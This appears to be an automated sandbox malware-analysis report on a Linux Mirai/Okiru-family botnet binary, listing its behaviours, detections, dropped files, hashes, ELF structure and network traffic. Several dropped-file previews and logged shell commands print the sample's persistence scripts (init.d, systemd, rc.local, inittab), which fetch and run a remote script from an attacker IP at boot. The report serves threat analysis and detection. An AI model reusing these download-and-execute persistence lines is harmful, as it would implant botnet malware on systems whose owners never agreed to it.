      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5523/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5600/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5524/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5601/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5503/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5525/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5602/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5526/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5603/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5527/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5604/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5605/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5484)File opened: /proc/5606/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5449)Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"Jump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5471)Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"Jump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5473)Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"Jump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5475)Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"Jump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5476)Shell command executed: sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"Jump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5478)Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"Jump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5480)Shell command executed: sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"Jump to behavior
      Source: /bin/sh (PID: 5472)Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/systemJump to behavior
      Source: /bin/sh (PID: 5477)Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/shJump to behavior
      Source: /bin/sh (PID: 5479)Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.dJump to behavior
      Source: /bin/sh (PID: 5455)Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.serviceJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5432)File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)Jump to behavior
      Source: /usr/bin/chmod (PID: 5472)File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)Jump to behavior
      Source: /usr/bin/chmod (PID: 5477)File: /etc/init.d/sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5432)Writes shell script file to disk with an unusual file extension: /etc/init.d/systemJump to dropped file
      Source: /tmp/x86_32.nn.elf (PID: 5432)Writes shell script file to disk with an unusual file extension: /etc/rc.localJump to dropped file
      Source: /bin/sh (PID: 5475)Writes shell script file to disk with an unusual file extension: /etc/init.d/shJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: /tmp/x86_32.nn.elf (PID: 5432)File: /etc/init.d/systemJump to dropped file
      Source: /bin/sh (PID: 5475)File: /etc/init.d/shJump to dropped file

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: x86_32.nn.elf, type: SAMPLE
      Source: Yara matchFile source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: x86_32.nn.elf PID: 5432, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: x86_32.nn.elf, type: SAMPLE
      Source: Yara matchFile source: 5432.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: x86_32.nn.elf PID: 5432, type: MEMORYSTR
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information2
      Scripting
      Valid AccountsWindows Management Instrumentation1
      Unix Shell Configuration Modification
      1
      Unix Shell Configuration Modification
      1
      Masquerading
      1
      OS Credential Dumping
      System Service DiscoveryRemote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network Medium1
      Data Manipulation
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      Systemd Service
      1
      Systemd Service
      2
      File and Directory Permissions Modification
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
      Non-Standard Port
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAt2
      Scripting
      Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
      Application Layer Protocol
      Traffic DuplicationData Destruction
      No configs have been found
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Number of created Files
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1580233 Sample: x86_32.nn.elf Startdate: 24/12/2024 Architecture: LINUX Score: 84 51 94.156.227.234, 38242, 44546, 44548 NETIXBG Bulgaria 2->51 53 185.125.190.26, 443 CANONICAL-ASGB United Kingdom 2->53 55 daisy.ubuntu.com 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 Multi AV Scanner detection for submitted file 2->59 61 Yara detected Okiru 2->61 63 Machine Learning detection for sample 2->63 8 x86_32.nn.elf 2->8         started        12 udisksd dumpe2fs 2->12         started        14 udisksd dumpe2fs 2->14         started        16 2 other processes 2->16 signatures3 process4 file5 43 /etc/rc.local, POSIX 8->43 dropped 45 /etc/profile, ASCII 8->45 dropped 47 /etc/init.d/system, POSIX 8->47 dropped 65 Sample tries to set files in /etc globally writable 8->65 67 Sample tries to persist itself using /etc/profile 8->67 69 Drops files in suspicious directories 8->69 71 Sample tries to persist itself using System V runlevels 8->71 18 x86_32.nn.elf sh 8->18         started        20 x86_32.nn.elf sh 8->20         started        22 x86_32.nn.elf sh 8->22         started        24 5 other processes 8->24 signatures6 process7 file8 28 sh chmod 18->28         started        31 sh ln 20->31         started        33 sh chmod 22->33         started        49 /etc/init.d/sh, POSIX 24->49 dropped 73 Drops files in suspicious directories 24->73 35 sh ln 24->35         started        37 sh systemctl 24->37         started        39 sh mkdir 24->39         started        41 x86_32.nn.elf 24->41         started        signatures9 process10 signatures11 75 Sample tries to set files in /etc globally writable 28->75 77 Sample tries to persist itself using System V runlevels 31->77

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      x86_32.nn.elf23%VirustotalBrowse
      x86_32.nn.elf21%ReversingLabsLinux.Backdoor.Mirai
      x86_32.nn.elf100%Joe Sandbox ML
      SourceDetectionScannerLabelLink
      /etc/init.d/sh3%ReversingLabsText.Browser.Generic
      /etc/init.d/system3%ReversingLabsText.Browser.Generic
      /etc/rc.local0%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      NameIPActiveMaliciousAntivirus DetectionReputation
      daisy.ubuntu.com
      162.213.35.25
      truefalse
        high
        NameSourceMaliciousAntivirus DetectionReputation
        http://94.156.227.233/lol.shx86_32.nn.elf, 5432.1.00000000ffe42000.00000000ffe63000.rw-.sdmpfalse
          high
          http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sx86_32.nn.elffalse
            high
            http://94.156.227.233/x86_32.nn.elf, profile.12.dr, system.12.dr, inittab.12.dr, sh.30.dr, bootcmd.12.dr, custom.service.12.drfalse
              high
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              185.125.190.26
              unknownUnited Kingdom
              41231CANONICAL-ASGBfalse
              94.156.227.234
              unknownBulgaria
              57463NETIXBGfalse
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              185.125.190.26splarm6.elfGet hashmaliciousUnknownBrowse
                zerppc.elfGet hashmaliciousUnknownBrowse
                  zerarm5.elfGet hashmaliciousUnknownBrowse
                    zermips.elfGet hashmaliciousUnknownBrowse
                      bot.arm.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                        sh4.nn.elfGet hashmaliciousOkiruBrowse
                          jackmymips64.elfGet hashmaliciousGafgyt, MiraiBrowse
                            arm5.nn.elfGet hashmaliciousOkiruBrowse
                              arm.nn-20241223-1416.elfGet hashmaliciousOkiruBrowse
                                hidakibest.arm5.elfGet hashmaliciousGafgyt, MiraiBrowse
                                  94.156.227.234mipsel.nn.elfGet hashmaliciousOkiruBrowse
                                    arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                      powerpc.nn.elfGet hashmaliciousOkiruBrowse
                                        x86_32.nn.elfGet hashmaliciousOkiruBrowse
                                          arm7.nn-20241224-0051.elfGet hashmaliciousMirai, OkiruBrowse
                                            sparc.nn.elfGet hashmaliciousOkiruBrowse
                                              arm5.nn-20241224-0050.elfGet hashmaliciousOkiruBrowse
                                                arm.nn-20241224-0050.elfGet hashmaliciousOkiruBrowse
                                                  mipsel.nn.elfGet hashmaliciousOkiruBrowse
                                                    powerpc.nn.elfGet hashmaliciousOkiruBrowse
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      daisy.ubuntu.comsplarm6.elfGet hashmaliciousUnknownBrowse
                                                      • 162.213.35.25
                                                      jklarm6.elfGet hashmaliciousUnknownBrowse
                                                      • 162.213.35.24
                                                      arm.nn-20241224-0050.elfGet hashmaliciousOkiruBrowse
                                                      • 162.213.35.24
                                                      arm6.nn-20241224-0050.elfGet hashmaliciousOkiruBrowse
                                                      • 162.213.35.25
                                                      m68k.nn.elfGet hashmaliciousOkiruBrowse
                                                      • 162.213.35.25
                                                      sh4.nn.elfGet hashmaliciousOkiruBrowse
                                                      • 162.213.35.25
                                                      arm7.elfGet hashmaliciousMiraiBrowse
                                                      • 162.213.35.25
                                                      mipsel.elfGet hashmaliciousUnknownBrowse
                                                      • 162.213.35.25
                                                      arm6.elfGet hashmaliciousUnknownBrowse
                                                      • 162.213.35.25
                                                      jackmyi686.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                      • 162.213.35.25
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      CANONICAL-ASGBmipsel.nn.elfGet hashmaliciousOkiruBrowse
                                                      • 91.189.91.42
                                                      nklarm6.elfGet hashmaliciousUnknownBrowse
                                                      • 91.189.91.42
                                                      splarm6.elfGet hashmaliciousUnknownBrowse
                                                      • 185.125.190.26
                                                      nabarm6.elfGet hashmaliciousUnknownBrowse
                                                      • 91.189.91.42
                                                      zerppc.elfGet hashmaliciousUnknownBrowse
                                                      • 185.125.190.26
                                                      zerarm5.elfGet hashmaliciousUnknownBrowse
                                                      • 185.125.190.26
                                                      zermips.elfGet hashmaliciousUnknownBrowse
                                                      • 185.125.190.26
                                                      zerm68k.elfGet hashmaliciousUnknownBrowse
                                                      • 91.189.91.42
                                                      zerarm6.elfGet hashmaliciousUnknownBrowse
                                                      • 91.189.91.42
                                                      armv4eb.elfGet hashmaliciousUnknownBrowse
                                                      • 91.189.91.42
                                                      NETIXBGmipsel.nn.elfGet hashmaliciousOkiruBrowse
                                                      • 94.156.227.234
                                                      arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                      • 94.156.227.234
                                                      powerpc.nn.elfGet hashmaliciousOkiruBrowse
                                                      • 94.156.227.234
                                                      x86_32.nn.elfGet hashmaliciousOkiruBrowse
                                                      • 94.156.227.234
                                                      arm7.nn-20241224-0051.elfGet hashmaliciousMirai, OkiruBrowse
                                                      • 94.156.227.234
                                                      sparc.nn.elfGet hashmaliciousOkiruBrowse
                                                      • 94.156.227.234
                                                      arm5.nn-20241224-0050.elfGet hashmaliciousOkiruBrowse
                                                      • 94.156.227.234
                                                      arm.nn-20241224-0050.elfGet hashmaliciousOkiruBrowse
                                                      • 94.156.227.234
                                                      mipsel.nn.elfGet hashmaliciousOkiruBrowse
                                                      • 94.156.227.234
                                                      powerpc.nn.elfGet hashmaliciousOkiruBrowse
                                                      • 94.156.227.234
                                                      No context
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      /etc/init.d/shx86_32.nn.elfGet hashmaliciousOkiruBrowse
                                                        x86_64.nn.elfGet hashmaliciousOkiruBrowse
                                                          x86_64.nn.elfGet hashmaliciousOkiruBrowse
                                                            x86_32.nn.elfGet hashmaliciousOkiruBrowse
                                                              x86_32.nn.elfGet hashmaliciousOkiruBrowse
                                                                x86_64.nn.elfGet hashmaliciousOkiruBrowse
                                                                  x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                    x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                        x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                          Process:/tmp/x86_32.nn.elf
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):111
                                                                          Entropy (8bit):4.663595298101345
                                                                          Encrypted:false
                                                                          SSDEEP:3:KPJRK+KFtSyLdjX48FIbILbaaFOdFXa5O:WJ8+KHSYZX48bbaaeXCO
                                                                          MD5:3290F4F4E0B77B577C59026DEF246CEE
                                                                          SHA1:C51EAE7170430B5697B881BE716280D1FAAA9147
                                                                          SHA-256:534E1753E7B5026C5F689F31942BD84E7869232A5CE24AE02B0A9647B3E2EDCD
                                                                          SHA-512:DFE561F390A0003C92D0528D418CADA2A84DD4585F838F4A37BDD1790C8B7E947AFD31B527E4F98AD55F49F4168F4574540CCFF2D2EE38BD2A3923DEB9FE6345
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:run bootcmd_mmc0; /bin/sh && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                                                                          Process:/bin/sh
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):355
                                                                          Entropy (8bit):4.416220583499086
                                                                          Encrypted:false
                                                                          SSDEEP:6:h2Rk8d/Kd6Nx/SNAjDTZX48bJaJFCwWBvM1FnwfUMdNfabwHeJdxL/RuYHdSOovl:QRkobNxaNoPUJgjvM1F5KN+dRRucSOyl
                                                                          MD5:4C835AF4434E28E5B56D8CDFA8EE753D
                                                                          SHA1:B18DA30B2DF68AE4C788540CED328CA545C02F42
                                                                          SHA-256:CA0FAC03BB49D9F40E83353A3C85D27B8AD800B8A77F88D1B43025148672E28D
                                                                          SHA-512:877B96464C5D6AF38B84F8BE6ECDDA74A9703AA298A897B2EF8DEC9E9B929ECA2E8324979A80033B0E334820B15275E51C1E60EC5A26A7B379A2D8DA5BAC6162
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                          Joe Sandbox View:
                                                                          • Filename: x86_32.nn.elf, Detection: malicious, Browse
                                                                          • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                                                          • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                                                          • Filename: x86_32.nn.elf, Detection: malicious, Browse
                                                                          • Filename: x86_32.nn.elf, Detection: malicious, Browse
                                                                          • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                                                          • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                                                          • Filename: x86_32.nn.elf, Detection: malicious, Browse
                                                                          • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                                                          • Filename: x86_32.nn.elf, Detection: malicious, Browse
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:#!/bin/sh.# /etc/init.d/sh..case "" in. start). echo 'Starting sh'. /bin/sh &. wget http://94.156.227.233/ -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping sh'. killall sh. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start|stop|restart}". exit 1. ;;.esac.exit 0.
                                                                          Process:/tmp/x86_32.nn.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):98
                                                                          Entropy (8bit):4.615605979741142
                                                                          Encrypted:false
                                                                          SSDEEP:3:TKH4v9+KFyFiLdjX48FIbILpaKB0dFLoKE0:h8KooZX48bzBeLXE0
                                                                          MD5:FE7F857A52EC42881A76D01D4A4A1C3C
                                                                          SHA1:6391FE715F06AB2D7E58D18A41ED3A358C7E820C
                                                                          SHA-256:20B80070DF0EDB6A011753C41051823E2F87C46A5493D6323BB5C023A19D2870
                                                                          SHA-512:4AA09F596ACE2DA18FE88DA2224681EAB2A4F77D005E2C67E97E9A0751C387F8DCCD8D1BB05644D75ED2F42959B6EE491D292F80CFEBB5D80EA5F0CE84C47816
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:#!/bin/sh./bin/sh &.wget http://94.156.227.233/ -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.
                                                                          Process:/tmp/x86_32.nn.elf
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):103
                                                                          Entropy (8bit):4.612417623467759
                                                                          Encrypted:false
                                                                          SSDEEP:3:nAWu5YFtSyLdjX48FIbILbaaFOdFXa5O:A6HSYZX48bbaaeXCO
                                                                          MD5:175C6814BBE06EB5816EFE3FE3934230
                                                                          SHA1:8C1A49BF7CA134E8AD0DDA70872367062BC600C5
                                                                          SHA-256:11CB198833B5FB514AF33682A7148F95AA28CAEA16908A27FA10D71DD272730E
                                                                          SHA-512:C1A6BC79D50EEED397A98329E7A2CD7486CBB36F9D3B25AEADA15473D10C31FC2F44D2029F5A174FC813E3BB6B974174850989BF2ADD642F4CD4F1D279B6B1F1
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:::respawn:/bin/sh && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                                                                          Process:/tmp/x86_32.nn.elf
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):53
                                                                          Entropy (8bit):3.871459242626451
                                                                          Encrypted:false
                                                                          SSDEEP:3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
                                                                          MD5:2BD9B4BE30579E633FC0191AA93DF486
                                                                          SHA1:7D63A9BD9662E86666B27C1B50DB8E7370C624FF
                                                                          SHA-256:64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
                                                                          SHA-512:AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
                                                                          Malicious:false
                                                                          Preview:gorilla botnet is on the device ur not a cat go away.
                                                                          Process:/tmp/x86_32.nn.elf
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):94
                                                                          Entropy (8bit):4.486383977913608
                                                                          Encrypted:false
                                                                          SSDEEP:3:pKWNFyFiLdjX48FIbILbaaFOdFXa50:kKooZX48bbaaeXC0
                                                                          MD5:CEC61C0CDC61AB271C45B85281469388
                                                                          SHA1:E2DC08B86AC16A6A9BDA73D26DE0055528C647D9
                                                                          SHA-256:AE69256D9ACCEE8C05AFBF46267368A0DDB3E5C9C54D24CFB018A35FEF86C560
                                                                          SHA-512:71A65EB5CBBD53E395E8A2B392CB41E289874583C4A17E086498201C6078E5043B680B4971D1913863B2699626F05F63B0936BAFCE9A8F01C6DBAFEE5E93F2A7
                                                                          Malicious:true
                                                                          Preview:/bin/sh &.wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.
                                                                          Process:/tmp/x86_32.nn.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):10
                                                                          Entropy (8bit):3.121928094887362
                                                                          Encrypted:false
                                                                          SSDEEP:3:TKH4vn:hv
                                                                          MD5:3E2B31C72181B87149FF995E7202C0E3
                                                                          SHA1:BD971BEC88149956458A10FC9C5ECB3EB99DD452
                                                                          SHA-256:A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
                                                                          SHA-512:543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:#!/bin/sh.
                                                                          Process:/tmp/x86_32.nn.elf
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):292
                                                                          Entropy (8bit):5.064804988275458
                                                                          Encrypted:false
                                                                          SSDEEP:6:z8ifitRZAMzdK+Gs2+GWRdbZX48B+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+y+GWRdtd+GWRXY+GWRuL1I
                                                                          MD5:8156A50E9D158639626649BD134E7D5D
                                                                          SHA1:D95D108656621F4B4F82B93CA0694D66F4A2FEF4
                                                                          SHA-256:FB7F3B6DA55120E08AB0B9A9F4A9ECB1BB5D89BFD665EBE23C150FBFBC06E4D8
                                                                          SHA-512:DB79A871E5317E3B9A93FF84E71318F5ABC85EBDE7C9521DF35C20C0AD8251BEB3DB33673BE4F4FF2501256613C50128BA36323C0DECD348FF6CA8A73856BE10
                                                                          Malicious:false
                                                                          Preview:[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/bin/sh.ExecStartPost=/usr/bin/wget -O /tmp/lol.sh http://94.156.227.233/.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.
                                                                          Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):76
                                                                          Entropy (8bit):3.7627880354948586
                                                                          Encrypted:false
                                                                          SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                                          MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                                          SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                                          SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                                          SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                                          Malicious:false
                                                                          Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                                                          File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
                                                                          Entropy (8bit):6.480524909504169
                                                                          TrID:
                                                                          • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                                                          • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                                                          File name:x86_32.nn.elf
                                                                          File size:79'312 bytes
                                                                          MD5:7a8c8bd1879880b4910dc8511392a718
                                                                          SHA1:f10607e0a3e2fac1f00257ffccb9a1dc1c69ebaf
                                                                          SHA256:cbc99993ee3f76b86331fabc4929c8277a76a2d35c86af1982901e8b5f9b03ae
                                                                          SHA512:ee9d4252c913829f1de2ddcc03f2d11fadce33a5dd84461db3cbc7baf4e72991febe87804ef421531203efd2337adde53802ba9f545f3f31cb2a581e36978fe1
                                                                          SSDEEP:1536:pozGqITKhN63JFSBFIeRyUpGj9OCvcn/swKaNd1fcsjjuQ2BaK3Spw8:GzGq2KhNCJFSBFIeRyUE0nkwKaNdZcmF
                                                                          TLSH:0E735CC0E983E9F1EA461175153BA73ACF72F5BD1134EA17DB68A933F942600D61638C
                                                                          File Content Preview:.ELF....................d...4...@4......4. ...(......................)...)...............0...............)..........Q.td............................U..S.......w/...h........[]...$.............U......=.....t..5....$......$.......u........t....h............

                                                                          ELF header

                                                                          Class:ELF32
                                                                          Data:2's complement, little endian
                                                                          Version:1 (current)
                                                                          Machine:Intel 80386
                                                                          Version Number:0x1
                                                                          Type:EXEC (Executable file)
                                                                          OS/ABI:UNIX - System V
                                                                          ABI Version:0
                                                                          Entry Point Address:0x8048164
                                                                          Flags:0x0
                                                                          ELF Header Size:52
                                                                          Program Header Offset:52
                                                                          Program Header Size:32
                                                                          Number of Program Headers:3
                                                                          Section Header Offset:78912
                                                                          Section Header Size:40
                                                                          Number of Section Headers:10
                                                                          Header String Table Index:9
                                                                          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                          NULL0x00x00x00x00x0000
                                                                          .initPROGBITS0x80480940x940x1c0x00x6AX001
                                                                          .textPROGBITS0x80480b00xb00x102f60x00x6AX0016
                                                                          .finiPROGBITS0x80583a60x103a60x170x00x6AX001
                                                                          .rodataPROGBITS0x80583c00x103c00x255c0x00x2A0032
                                                                          .ctorsPROGBITS0x805b0000x130000x80x00x3WA004
                                                                          .dtorsPROGBITS0x805b0080x130080x80x00x3WA004
                                                                          .dataPROGBITS0x805b0200x130200x3e00x00x3WA0032
                                                                          .bssNOBITS0x805b4000x134000x25e00x00x3WA0032
                                                                          .shstrtabSTRTAB0x00x134000x3e0x00x0001
                                                                          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                          LOAD0x00x80480000x80480000x1291c0x1291c6.58420x5R E0x1000.init .text .fini .rodata
                                                                          LOAD0x130000x805b0000x805b0000x4000x29e05.33310x6RW 0x1000.ctors .dtors .data .bss
                                                                          GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Dec 24, 2024 05:27:49.933511019 CET4454638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:27:50.197447062 CET382424454694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:27:50.197494984 CET4454638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:27:50.197518110 CET4454638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:27:50.320272923 CET382424454694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:27:50.713965893 CET4454638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:27:50.876173973 CET382424454694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:27:51.326879978 CET382424454694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:27:51.326929092 CET4454638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:27:51.717369080 CET4454838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:27:51.836920977 CET382424454894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:27:51.836977005 CET4454838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:27:51.837028027 CET4454838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:27:51.957324982 CET382424454894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:27:52.351399899 CET4454838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:27:52.512172937 CET382424454894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:27:52.955116987 CET382424454894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:27:52.955187082 CET4454838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:27:53.354016066 CET4455038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:27:53.473474026 CET382424455094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:27:53.473535061 CET4455038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:27:53.473632097 CET4455038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:27:53.593034029 CET382424455094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:27:54.088217020 CET4455038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:27:54.248133898 CET382424455094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:27:54.589328051 CET382424455094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:27:54.589391947 CET4455038242192.168.2.1394.156.227.234
